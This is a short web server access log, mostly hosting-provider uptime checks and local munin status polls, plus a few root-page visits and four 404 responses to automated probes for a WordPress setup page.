198.54.118.134 - - [16/Jun/2025:02:36:17 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [16/Jun/2025:02:38:09 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [16/Jun/2025:02:38:42 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:02:38:48 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
198.54.118.134 - - [16/Jun/2025:02:39:03 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:02:40:01 +0000] "GET /whm-server-status HTTP/1.0" 200 40953 "-" "-"
127.0.0.1 - - [16/Jun/2025:02:40:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1450 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:02:40:03 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1451 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [16/Jun/2025:02:40:04 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [16/Jun/2025:02:40:05 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1450 "-" "munin/2.0.73 (libwww-perl/6.67)"
198.177.126.50 - - [16/Jun/2025:02:41:06 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [16/Jun/2025:02:41:34 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
52.57.46.129 - - [16/Jun/2025:02:41:43 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:116.0) Gecko/20061209 Firefox/116.0"
3.68.147.29 - - [16/Jun/2025:02:41:43 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Linux; Android 13; Pixel 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
198.54.118.134 - - [16/Jun/2025:02:41:58 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [16/Jun/2025:02:42:51 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
2a06:98c0:3600::103 - - [16/Jun/2025:02:42:51 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
2a06:98c0:3600::103 - - [16/Jun/2025:02:43:16 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
2a06:98c0:3600::103 - - [16/Jun/2025:02:43:36 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
198.177.126.50 - - [16/Jun/2025:02:43:58 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [16/Jun/2025:02:44:26 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [16/Jun/2025:02:44:53 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:02:44:53 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
127.0.0.1 - - [16/Jun/2025:02:45:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41253 "-" "-"
127.0.0.1 - - [16/Jun/2025:02:45:03 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1453 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:02:45:05 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1454 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [16/Jun/2025:02:45:07 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [16/Jun/2025:02:45:09 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1455 "-" "munin/2.0.73 (libwww-perl/6.67)"
185.218.84.178 - - [16/Jun/2025:02:45:09 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
